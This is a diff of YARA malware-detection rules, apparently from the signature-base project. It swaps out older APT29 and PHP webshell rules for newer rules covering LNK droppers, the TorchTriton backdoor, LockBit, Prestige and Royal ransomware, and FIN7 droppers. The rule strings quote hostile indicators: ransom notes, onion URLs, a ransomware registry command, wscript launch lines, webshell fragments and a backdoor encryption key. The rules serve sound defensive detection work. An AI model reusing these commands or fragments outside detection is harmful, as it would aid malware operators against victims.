-		logic_hash = "fa853dac58c067a88f1784ac4017fd558151e54ed10ceb32ab90c99e970460fe"
+		logic_hash = "6cfccb863c3ea8f3f60520b0df03eee8e3b754699aa339fea21489d34e29f47b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c9048e2f5ea2ef9516cac06dc0fba8a7e97754468c0d9dc1e5f7bce6dbda2cc"
+		hash1 = "dbd8cbbaf59d19cf7566042945e36409cd090bc711e339d3f2ec652bc26d6a03"
 
 	strings:
-		$x1 = "msi.dll.eng" fullword wide
-		$s2 = "ahinovx" fullword ascii
-		$s3 = "jkpsxy47CDEMNSTYbhinqrwx56" fullword ascii
-		$s4 = "PVYdejmrsy12" fullword ascii
-		$s6 = "FLMTUZaijkpsxy45CD" fullword ascii
-		$s7 = "afhopqvw34ABIJOPTYZehmo" fullword ascii
+		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
+		$s2 = "c:\\windows\\temp\\TrueCrypt-7.2.exe" fullword wide
+		$s3 = "%s\\ssleay32.dll" fullword wide
+		$s4 = "%s\\libeay32.dll" fullword wide
+		$s5 = "%s\\fprot32.exe" fullword wide
+		$s6 = "Windows Index Services" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 7000KB and 4 of them )
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi_Dll : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Embedded_Worddoc : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "56586e0b-010a-5ad5-8822-5d370475aa06"
-		date = "2017-02-10"
+		description = "check for LNK files with indications of the Word program or an embedded doc"
+		author = "Greg Lesnewich"
+		id = "9677d41a-9d29-510c-98cd-122dc0ca9606"
+		date = "2023-01-02"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shellcrew_streamex.yar#L82-L98"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L3-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "087ac07a2bf822f7838ef46296150381cfc9af9b12b4023654023a779efc1db1"
-		score = 75
+		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
+		logic_hash = "a53fbfe0ccb5a4ab2320cde10d17f29770d888cf21cda4fdccc3d7ae8d123293"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "883108119d2f4db066fa82e37aa49ecd2dbdacda67eb936b96720663ed6565ce"
-		hash2 = "5311f862d7c824d13eea8293422211e94fb406d95af0ae51358accd4835aaef8"
-		hash3 = "191cbeffa36657ab1ef3939da023cacbc9de0285bbe7775069c3d6e18b372c3f"
+		version = "1.0"
+		DaysofYARA = "2/100"
 
 	strings:
-		$s1 = "NDOGDUA" fullword ascii
-		$s2 = "NsrdsrN" fullword ascii
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x4d9d and filesize < 300KB and all of them )
+		uint32be( 0x0 ) == 0x4C000000 and filesize > 10KB and any of them
 }
-rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_1 : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Smallscreensize
 {
 	meta:
-		description = "Auto-generated rule - file HRDG022184_certclint.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7239a5f3-9c29-57d7-be95-946d14039353"
-		date = "2016-12-29"
+		description = "check for LNKs that have a screen buffer size and WindowSize dimensions of 1x1"
+		author = "Greg Lesnewich"
+		id = "6194a76b-36d6-51d1-8d53-2e11172e29d2"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/WVflzO"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L10-L28"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L22-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d4a06fbf875ba2dbe64abcc21fab4eea1fe1b092498a09d9a310214562c1869e"
-		score = 75
+		logic_hash = "285985c21e34f8412b49dbfe04abad9f93af195801d0a8870ec3795b8a9a3787"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
-		$s2 = "Repeat last find command)Replace specific text with different text" fullword wide
-		$s3 = "l\\Processor(0)\\% Processor Time" fullword wide
-		$s6 = "Self Process" fullword wide
-		$s7 = "Default Process" fullword wide
-		$s8 = "Star Polk.exe" fullword wide
+		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
+		uint32be( 0x0 ) == 0x4c000000 and all of them
 }
-rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_2 : FILE
+rule SIGNATURE_BASE_MAL_Janicab_LNK
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "37cfba67-af85-5efe-9b07-9f1e5d9f9195"
-		date = "2016-12-29"
+		description = "detect LNK files used in Janicab infection chain"
+		author = "Greg Lesnewich"
+		id = "c21844d3-eeee-530e-a69c-b7f604616f0b"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/WVflzO"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L30-L50"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L46-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "134a76129ef2169ac60f21541ef51a223720badfad02f0822acc7fd6d49cf7e7"
+		hash = "0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f"
+		hash = "22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c"
+		hash = "4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840"
+		hash = "880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870"
+		hash = "f4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af"
+		logic_hash = "f9c000ffb6a95d616459e00f0220ad26cb1df77e35582d14dfce1637ddfb466c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
-		hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$x1 = "GoogleCrashReport.dll" fullword ascii
-		$s1 = "CrashErrors" fullword ascii
-		$s2 = "CrashSend" fullword ascii
-		$s3 = "CrashAddData" fullword ascii
-		$s4 = "CrashCleanup" fullword ascii
-		$s5 = "CrashInit" fullword ascii
+		$j_pdf1 = "%PDF-1.5" ascii wide
+		$j_cmd = "\\Windows\\System32\\cmd.exe" ascii wide
+		$j_pdf_stream = "endstream" ascii wide
+		$j_pdb_obj = "endobj" ascii wide
+		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
+		uint32be( 0x0 ) == 0x4C000000 and $dimensions and 2 of ( $j_* )
 }
-rule SIGNATURE_BASE_PAS_TOOL_PHP_WEB_KIT_Mod : FILE
+rule SIGNATURE_BASE_SUSP_ELF_Invalid_Version : FILE
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
-		author = "US CERT - modified by Florian Roth due to performance reasons"
-		id = "6bc75e44-7784-5e48-9bbc-052d84ebee83"
-		date = "2016-12-29"
+		description = "Identify ELF file that has mangled header info."
+		author = "@shellcromancer"
+		id = "5bd97fdd-0912-5f9b-877c-91fff9b98dea"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L52-L74"
+		reference = "https://tmpout.sh/1/1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L70-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fab894d9609c1fca4a85457e6799d082dfd3eb9ca0564abc04a1a0dd07a7b546"
-		score = 75
+		hash = "05379bbf3f46e05d385bbd853d33a13e7e5d7d50"
+		logic_hash = "33f096318647867bcd90d7ba77878f43d34477b2b2cbd7410c191e60573d6cd5"
+		score = 55
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$php = "<?php"
-		$base64decode1 = "='base'.("
-		$strreplace = "str_replace(\"\\n\", ''"
-		$md5 = ".substr(md5(strrev("
-		$gzinflate = "gzinflate"
-		$cookie = "_COOKIE"
-		$isset = "isset"
+		version = "0.1"
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and $php at 0 and ( filesize > 10KB and filesize < 30KB ) and #cookie == 2 and #isset == 3 and all of them
+		( uint32( 0 ) == 0x464c457f and uint8( 0x6 ) > 1 )
 }
-rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V3 : FILE
+rule SIGNATURE_BASE_MAL_ELF_Torchtriton : FILE
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dc5fa2c9-3e1e-594d-be4f-141e1f4915f1"
-		date = "2016-01-01"
+		description = "Detection for backdoor (TorchTriton) distributed with a nightly build of PyTorch"
+		author = "Silas Cutler"
+		id = "85e98ee7-30bf-554f-a0ac-9df263e6dfe4"
+		date = "2023-01-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/wordfence/grizzly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L76-L95"
+		reference = "https://www.bleepingcomputer.com/news/security/pytorch-discloses-malicious-dependency-chain-compromise-over-holidays/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L88-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21bf0afcd3f8de813ddfe41ef32e45806e9f9d7d3b08ae7ce65017c35e32a868"
+		hash = "2385b29489cd9e35f92c072780f903ae2e517ed422eae67246ae50a5cc738a0e"
+		logic_hash = "12de3c3785aaf3623097db58abfe8ee2cbd9a0e712bf752165952de9a5fdb07d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		DaysofYARA = "2/100"
 
 	strings:
-		$php = "<?php $"
-		$php2 = "@assert(base64_decode($_REQUEST["
-		$s1 = "(str_replace(\"\\n\", '', '"
-		$s2 = "(strrev($" ascii
-		$s3 = "de'.'code';" ascii
+		$error = "failed to send packet"
+		$aes_key = "gIdk8tzrHLOM)mPY-R)QgG[;yRXYCZFU"
+		$aes_iv = "?BVsNqL]S.Ni"
+		$func01 = "splitIntoDomains("
+		$func02 = "packageForTransport"
+		$func03 = "gatherFiles"
+		$func04 = "void sendFile("
+		$domain = "&z-%`-(*"
 
 	condition:
-		(( uint32( 0 ) == 0x68703f3c and $php at 0 ) or $php2 ) and filesize > 8KB and filesize < 100KB and all of ( $s* )
+		uint32( 0 ) == 0x464c457f and ( ( all of ( $aes_* ) ) or ( all of ( $func* ) and $error ) or ( $domain and 2 of them ) )
 }
-rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V4 : FILE
+rule SIGNATURE_BASE_MAL_GOLDBACKDOOR_LNK
 {
 	meta:
-		description = "Detects PAS Tool PHP Web Kit"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a5f915cd-b9c5-5cd3-b0a2-c15f6124737a"
-		date = "2016-01-01"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Greg Lesnewich"
+		id = "9a80f875-4843-535c-9f2b-b04da55713b1"
+		date = "2023-01-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/wordfence/grizzly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L97-L116"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L119-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e2eaa0abd14f4dd08815c44797df707a08df1ea4e04ae69ba67d128a0fe4eff5"
+		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
+		logic_hash = "043d01758c722964e848e51cf2747c5879f03f0fd43af827e2035abf113daf9d"
 		score = 75
 		quality = 85
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "2/100"
+
+	strings:
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$doc_icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
+		$script_apionedrivecom_hex_enc_str = "6170692e6f6e6564726976652e636f6d" wide
+		$script_kernel32dll_hex_enc_str = "6b65726e656c33322e646c6c" wide
+		$script_GlobalAlloc_hex_enc_str = "476c6f62616c416c6c6f63" wide
+		$script_VirtualProtect_hex_enc_str = "5669727475616c50726f74656374" wide
+		$script_WriteByte_hex_enc_str = "577269746542797465" wide
+		$script_CreateThread_hex_enc_str = "437265617465546872656164" wide
+
+	condition:
+		uint32be( 0x0 ) == 0x4C000000 and 1 of ( $doc* ) and 2 of ( $script* )
+}
+rule SIGNATURE_BASE_MAL_EXE_Lockbit_V2 : FILE
+{
+	meta:
+		description = "Detection for LockBit version 2.x from 2011"
+		author = "Silas Cutler, modified by Florian Roth"
+		id = "a2c27110-e63b-5f93-88a0-98c12811e8b4"
+		date = "2023-01-01"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L144-L169"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		hash = "00260c390ffab5734208a7199df0e4229a76261c3f5b7264c4515acb8eb9c2f8"
+		logic_hash = "9472727d75e34d8bf87c56b74a6dfc04052e621b5fe31732ea9a10c76a05e0c0"
+		score = 80
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$php = "<?php $"
-		$s1 = "(StR_ReplAcE(\"\\n\",'',"
-		$s2 = ";if(PHP_VERSION<'5'){" ascii
-		$s3 = "=SuBstr_rePlACe(" ascii
+		$s_ransom_note01 = "that is located in every encrypted folder." wide
+		$s_ransom_note02 = "Would you like to earn millions of dollars?" wide
+		$x_ransom_tox = "3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" wide
+		$x_ransom_url = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" wide
+		$s_str1 = "Active:[ %d [                  Completed:[ %d" wide
+		$x_str2 = "\\LockBit_Ransomware.hta" wide ascii
+		$s_str2 = "Ransomware.hta" wide ascii
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ( $s* )
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_APT29_Wellmess_Dotnet_Unique_Strings : FILE
+
+rule SIGNATURE_BASE_MAL_EXE_Prestigeransomware : FILE
 {
 	meta:
-		description = "Rule to detect WellMess .NET samples based on unique strings and function/variable names"
-		author = "NCSC"
-		id = "7a058ec7-f795-5226-b511-ff469a969ee6"
-		date = "2016-12-30"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L120-L136"
+		description = "Detection for Prestige Ransomware"
+		author = "Silas Cutler, modfied by Florian Roth"
+		id = "5ac8033a-8b15-5abe-89d5-018a4fef9ab5"
+		date = "2023-01-04"
+		modified = "2023-01-06"
+		reference = "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L171-L195"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41"
-		logic_hash = "90e8480aa50e18202007bcffdc8348290ad0ac0588c924b4f75ea425a6cae32d"
-		score = 75
+		hash = "5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57"
+		logic_hash = "2f51ca71d28c8d0df8de22011e16919672d5f9d3f3d94594c5d0cbf7f1585a1e"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
+		DaysofYARA = "4/100"
 
 	strings:
-		$s1 = "HealthInterval" wide
-		$s2 = "Hello from Proxy" wide
-		$s3 = "Start bot:" wide
-		$s4 = "FromNormalToBase64" ascii
-		$s5 = "FromBase64ToNormal" ascii
-		$s6 = "WellMess" ascii
+		$x_ransom_email = "Prestige.ranusomeware@Proton.me" wide
+		$x_reg_ransom_note = "C:\\Windows\\System32\\reg.exe add HKCR\\enc\\shell\\open\\command /ve /t REG_SZ /d \"C:\\Windows\\Notepad.exe C:\\Users\\Public\\README\" /f" wide
+		$ransom_message01 = "To decrypt all the data, you will need to purchase our decryption software." wide
+		$ransom_message02 = "Contact us {}. In the letter, type your ID = {:X}." wide
+		$ransom_message03 = "- Do not try to decrypt your data using third party software, it may cause permanent data loss." wide
+		$ransom_message04 = "- Do not modify or rename encrypted files. You will lose them." wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint16( 0x3c ) ) == 0x4550 and 3 of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them or pe.imphash ( ) == "a32bbc5df4195de63ea06feb46cd6b55" )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_Schedule : FILE
+rule SIGNATURE_BASE_MAL_EXE_Royalransomware : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the key schedule used for encryption"
-		author = "NCSC"
-		id = "8d89edc1-a9fc-5155-9dc2-8d7f952f90d1"
-		date = "2016-12-30"
+		description = "Detection for Royal Ransomware seen Dec 2022"
+		author = "Silas Cutler, modfied by Florian Roth"
+		id = "f83316f7-b8c4-5907-a38e-80535215e7ef"
+		date = "2023-01-03"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L138-L153"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L197-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "d4f7ec82e51f1063b4d61302e5ff9268dd3233bb44269fc32cb57fb9240f96e2"
+		hash = "a8384c9e3689eb72fa737b570dbb53b2c3d103c62d46747a96e1e1becf14dfea"
+		logic_hash = "6f93bade7709945b478cbdc721d85ad9243d56ace19fba25835cec13a6210dfb"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
+		DaysofYARA = "3/100"
 
-	strings:
-		$ = { C7 05 ?? ?? ?? ?? 63 51 E1 B7 B8 ?? ?? ?? ?? 8B 48
-            FC 81 E9 47 86 C8 61 89 08 83 C0 04 3D ?? ?? ?? ??
-            7E EB 33 D2 33 C9 B8 2C 00 00 00 89 55 D4 33 F6 89
-            4D D8 33 DB 3B F8 0F 4F C7 8D 04 40 89 45 D0 83 F8
-            01 7C 4F 0F 1F 80 00 00 00 00 }
+	strings:
+		$x_ext = ".royal_" wide
+		$x_fname = "royal_dll.dll"
+		$s_readme = "README.TXT" wide
+		$s_cli_flag01 = "-networkonly" wide
+		$s_cli_flag02 = "-localonly" wide
+		$x_ransom_msg01 = "If you are reading this, it means that your system were hit by Royal ransomware."
+		$x_ransom_msg02 = "Try Royal today and enter the new era of data security!"
+		$x_onion_site = "http://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion/"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		uint16( 0 ) == 0x5A4D and ( 2 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Encryption_Key_2B62 : FILE
+rule SIGNATURE_BASE_MAL_PY_Dimorf
 {
 	meta:
-		description = "Rule to detect SoreFang based on hardcoded encryption key"
-		author = "NCSC"
-		id = "9a7abad7-1cfa-52c8-9416-47cb80486714"
-		date = "2016-12-30"
+		description = "Detection for Dimorf ransomeware"
+		author = "Silas Cutler"
+		id = "78b53433-6926-58cd-8ec0-2195af803aab"
+		date = "2023-01-03"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L155-L167"
+		reference = "https://github.com/Ort0x36/Dimorf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L224-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "39ad6de70883fbe0377379c3cab15962372793043ebbf4054efb7cee3aff9104"
+		logic_hash = "7499b21f77d07364983b94134a60f7c99e71a5392386437d459a196bf71852fb"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$ = "2b6233eb3e872ff78988f4a8f3f6a3ba"
+		$func01 = "def find_and_encrypt"
+		$func02 = "def check_os"
+		$comment01 = "checks if the user has permission on the file."
+		$misc01 = "log_dimorf.log"
+		$misc02 = ".dimorf"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Directory_Enumeration_Output_Strings : FILE
+rule SIGNATURE_BASE_FIN7_Dropper_Aug17 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on formatted string output for directory enumeration"
-		author = "NCSC"
-		id = "e24dbda1-3d43-52a7-9249-70a648f4913e"
-		date = "2016-12-30"
+		description = "Detects Word Dropper from Proofpoint FIN7 Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4929dff6-9f33-5d22-b560-c2195440a1cc"
+		date = "2017-08-04"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L169-L183"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7_backdoor.yar#L12-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "8f029269f5a383737f38af04b05a16a71af5453bffe83e04ac53191eaa49d3e7"
+		logic_hash = "610b7288e08d36858de88abac3a86dcb6ebba1c019e17fb716f5c26aa964903b"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c91642c0a5a8781fff9fd400bff85b6715c96d8e17e2d2390c1771c683c7ead9"
+		hash2 = "cf86c7a92451dca1ebb76ebd3e469f3fa0d9b376487ee6d07ae57ab1b65a86f8"
 
 	strings:
-		$ = "----------All usres directory----------"
-		$ = "----------Desktop directory----------"
-		$ = "----------Documents directory----------"
+		$x1 = "tpircsj:e/ b// exe.tpircsw\" rt/" fullword ascii
+		$s1 = "Scripting.FileSystemObject$" fullword ascii
+		$s2 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
+		$s3 = "Project.ThisDocument.AutoOpen" fullword wide
+		$s4 = "\\system3" ascii
+		$s5 = "ShellV" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and 2 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Command_Elem_Cookie_Ga_Boundary_String : FILE
+rule SIGNATURE_BASE_FIN7_Backdoor_Aug17 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on scheduled task element and Cookie header/boundary strings"
-		author = "NCSC"
-		id = "3c6ffbad-9b39-5518-aa66-d76531ddb9ea"
-		date = "2016-12-30"
+		description = "Detects Word Dropper from Proofpoint FIN7 Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "906daf88-520b-57b5-825e-29f060b43183"
+		date = "2017-08-04"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L185-L199"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7_backdoor.yar#L34-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "65b31a12d8abb88fbb99fcc6b2707bec90e4edc35d0cf21903213eda5cacec88"
+		logic_hash = "76818317c543c1464898463741ddaf8c6368d0f5004c088a323c4323db49060c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ = "<Command>" wide
-		$ = "Cookie:_ga="
-		$ = "------974767299852498929531610575"
+		$x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
